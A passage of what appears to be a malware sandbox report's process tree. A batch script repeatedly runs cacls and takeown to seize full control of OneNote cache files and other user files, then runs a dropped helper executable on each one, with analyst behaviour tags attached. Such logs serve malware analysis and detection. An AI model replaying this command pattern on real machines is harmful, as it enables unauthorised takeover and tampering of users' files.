    PID:2140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\ServiceWorkerFiles\487CE187-44E6-47CC-B689-B558256E9E8C\Zrtu2hQ08VU_1.metadata"
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "Zrtu2hQ08VU_1.metadata" -nobanner
    3⤵
    PID:9120
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "Zrtu2hQ08VU_1.metadata" -nobanner
      4⤵
      PID:5244
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    PID:8876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:7568
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:3512
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:6540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:6936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:8076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "background.png" -nobanner
    3⤵
    PID:7684
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "background.png" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:8116
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin""
  2⤵
  PID:1120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin" /E /G Admin:F /C
    3⤵
    PID:8340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin"
    3⤵
    - Modifies file permissions
    PID:2416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000F.bin" -nobanner
    3⤵
    PID:948
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000F.bin" -nobanner
      4⤵
      PID:6504
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin""
  2⤵
  PID:3492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin" /E /G Admin:F /C
    3⤵
    PID:7152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin"
    3⤵
    PID:8040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000Q.bin" -nobanner
    3⤵
    PID:1676
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000Q.bin" -nobanner
      4⤵
      PID:5972
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin""
  2⤵
  PID:6724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin" /E /G Admin:F /C
    3⤵
    PID:6572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin"
    3⤵
    PID:8080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000014.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7144
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000014.bin" -nobanner
      4⤵
      PID:4072
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin""
  2⤵
  PID:7560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin" /E /G Admin:F /C
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin"
    3⤵
    PID:8216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000058.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3388
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000058.bin" -nobanner
      4⤵
      PID:9184
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin""
  2⤵
  PID:7316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin"
    3⤵
    PID:4352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000007E.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8444
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000007E.bin" -nobanner
      4⤵
      PID:1820
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin""
  2⤵
  PID:2236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin" /E /G Admin:F /C
    3⤵
    PID:6404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000007O.bin" -nobanner
    3⤵
    PID:5412
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000007O.bin" -nobanner
      4⤵
      PID:8260
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin""
  2⤵
  PID:8256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin" /E /G Admin:F /C
    3⤵
    PID:7544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin"
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000008D.bin" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000008D.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:7256
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin""
  2⤵
  PID:7176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin" /E /G Admin:F /C
    3⤵
    PID:9196
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin"
    3⤵
    - Modifies file permissions
    PID:10144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000008N.bin" -nobanner
    3⤵
    PID:6208
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000008N.bin" -nobanner
      4⤵
      PID:7340
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8172
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin" /E /G Admin:F /C
    3⤵
    PID:8128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin"
    3⤵
    PID:7852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000093.bin" -nobanner
    3⤵
    PID:8564
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000093.bin" -nobanner
      4⤵
      PID:1244
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin" /E /G Admin:F /C
    3⤵
    PID:6704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin"
    3⤵
    PID:6512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000A9.bin" -nobanner
    3⤵
    PID:6308
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000A9.bin" -nobanner
      4⤵
      PID:4724
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""
  2⤵
  PID:9136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"
    3⤵
    PID:8824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000G.bin" -nobanner
    3⤵
    PID:1132
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000G.bin" -nobanner
      4⤵
      PID:9092
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""
  2⤵
  PID:7408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C
    3⤵
    PID:8656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"
    3⤵
    PID:8672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000R.bin" -nobanner
    3⤵
    PID:8960
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000R.bin" -nobanner
      4⤵
      PID:2224
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""
  2⤵
  PID:8752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C
    3⤵
    PID:9056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000015.bin" -nobanner
    3⤵
    PID:5428
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000015.bin" -nobanner
      4⤵
      PID:5756
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin""
  2⤵
  PID:8540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin" /E /G Admin:F /C
    3⤵
    PID:8584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin"
    3⤵
    - Modifies file permissions
    PID:5588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000006H.bin" -nobanner
    3⤵
    PID:8348
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000006H.bin" -nobanner
      4⤵
      PID:2324
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin""
  2⤵
  PID:7108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin" /E /G Admin:F /C
    3⤵
    PID:7868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin"
    3⤵
    - Modifies file permissions
    PID:3920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000075.bin" -nobanner
    3⤵
    PID:9224
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000075.bin" -nobanner
      4⤵
      PID:8020
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin""
  2⤵
  PID:8716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin" /E /G Admin:F /C
    3⤵
    PID:8892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin"
    3⤵
    PID:9272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000083.bin" -nobanner
    3⤵
    PID:9240
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000083.bin" -nobanner
      4⤵
      PID:9344
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:9292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin" /E /G Admin:F /C
    3⤵
    PID:9448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin"
    3⤵
    - Modifies file permissions
    PID:9428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000009F.bin" -nobanner
    3⤵
    PID:9424
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000009F.bin" -nobanner
      4⤵
      PID:9472
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin""
  2⤵
  PID:9544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin" /E /G Admin:F /C
    3⤵
    PID:9412
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin"
    3⤵
    PID:9396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000AL.bin" -nobanner
    3⤵
    PID:9600
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000AL.bin" -nobanner
      4⤵
      PID:9644
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:460
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin""
  2⤵
  PID:9504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin" /E /G Admin:F /C
    3⤵
    PID:9528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin"
    3⤵
    PID:9620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000B1.bin" -nobanner
    3⤵
    PID:9604
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000B1.bin" -nobanner
      4⤵
      PID:9668
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin""
  2⤵
  PID:9776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin" /E /G Admin:F /C
    3⤵
    PID:9660
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin"
    3⤵
    - Modifies file permissions
    PID:9772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000C.bin" -nobanner
    3⤵
    PID:9664
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000C.bin" -nobanner
      4⤵
      PID:9712
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin""
  2⤵
  PID:9888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin"
    3⤵
    PID:9952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000O.bin" -nobanner
    3⤵
    PID:9860
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000O.bin" -nobanner
      4⤵
      PID:9864
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:10064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin""
  2⤵
  PID:10012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin" /E /G Admin:F /C
    3⤵
    PID:10036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin"
    3⤵
    PID:10048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000012.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:10052
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000012.bin" -nobanner
      4⤵
      PID:10060
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin""
  2⤵
  PID:6168
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin" /E /G Admin:F /C
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin"
    3⤵
    PID:6244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000056.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8452
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000056.bin" -nobanner
      4⤵
      PID:7608
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:10196
- C:\Windows\SysWOW64\cmd.exe
